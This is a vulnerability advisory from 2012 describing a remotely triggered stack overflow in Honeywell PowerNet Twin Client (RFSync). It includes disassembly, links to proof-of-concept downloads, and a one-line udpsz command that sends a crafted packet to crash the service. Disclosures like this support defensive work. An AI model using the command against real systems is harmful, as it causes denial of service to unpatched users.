#######################################################################
Luigi Auriemma
Application: PowerNet Twin Client
http://www.honeywellaidc.com/en-US/Pages/Product.aspx?category=Software&cat=HSM&pid=PowerNet%20Twin%20Client
Versions: <= 8.9 (RFSync 1.0.0.1)
Platforms: Windows
Bug: unexploitable stack overflow
Exploitation: remote
Date: 29 Jun 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"PowerNet Twin Client v8.9 PowerNet Twin Client is a serverless,
terminal based software used in 2.4 GHz networks."
#######################################################################
======
2) Bug
======
The software uses the function 00403cb0 to read 100 bytes from the
incoming connection and uses a signed 8bit value provided by the
client to copy this data in a stack buffer:
00403DCB |. 0FBE4424 29 MOVSX EAX,BYTE PTR SS:[ESP+29] ; 8bit size with 8->32bit
00403DD0 |. 8B8C24 38020000 MOV ECX,DWORD PTR SS:[ESP+238] ; integer expansion bug
00403DD7 |. 83C4 08 ADD ESP,8
00403DDA |. 48 DEC EAX ; integer overflow
00403DDB |. 85C9 TEST ECX,ECX
00403DDD |. 74 02 JE SHORT RFSync.00403DE1
00403DDF |. 8901 MOV DWORD PTR DS:[ECX],EAX
00403DE1 |> 8B9424 2C020000 MOV EDX,DWORD PTR SS:[ESP+22C]
00403DE8 |. 85D2 TEST EDX,EDX
00403DEA |. 74 29 JE SHORT RFSync.00403E15
00403DEC |. 8BC8 MOV ECX,EAX
00403DEE |. 8BD9 MOV EBX,ECX
00403DF0 |. C1E9 02 SHR ECX,2
00403DF3 |. 8BFA MOV EDI,EDX
00403DF5 |. 8D7424 23 LEA ESI,DWORD PTR SS:[ESP+23] ; stack overflow
00403DF9 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
So the byte 0x80 will become 0xffffff80 and so on.
Unfortunately this vulnerabily cannot be exploited to execute code
because there is no way to control the data located after the packet
that has a fixed size of 100 bytes: the result is just a Denial of
Service.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/19456.zip
udpsz -T -b 0x41 -C "11 00" SERVER 1804 100
#######################################################################
======
4) Fix
======
No fix.
#######################################################################